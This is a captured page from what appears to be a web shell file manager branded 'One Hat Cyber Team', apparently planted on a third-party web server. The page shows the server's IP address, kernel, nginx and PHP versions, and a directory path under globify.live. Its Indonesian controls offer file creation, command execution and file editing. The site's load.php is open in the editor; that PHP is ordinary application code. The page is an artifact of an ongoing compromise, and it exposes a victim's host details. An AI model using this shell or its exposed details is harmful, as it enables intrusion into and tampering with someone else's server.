One Hat Cyber Team
Your IP :
18.221.42.212
Server IP :
50.28.103.30
Server :
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software :
nginx/1.24.0
PHP Version :
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
wwwroot
/
globify.live
/
fns
/
basic_processes
/
Edit File:
load.php
<?php ini_set('max_execution_time', 0); $not_found = true; if (isset($data["process"])) { $data["process"] = preg_replace("/[^a-zA-Z0-9_]+/", "", $data["process"]); } if (!isset($data["process"]) || isset($data["process"]) && empty($data["process"])) { $data["process"] = 'allocate_images'; } if (isset($data["process"]) && !empty($data["process"])) { $data["process"] = str_replace('sp_', '', $data["process"]); $loadfnfile = 'fns/basic_processes/'.$data["process"].'.php'; if (file_exists($loadfnfile)) { $not_found = false; include($loadfnfile); $body_class = 'loading_page'; if (isset($page_content['page_status'])) { $body_class = $page_content['page_status']; } include('fns/basic_processes/page_content.php'); } } if ($not_found) { redirect('404'); } ?>
Simpan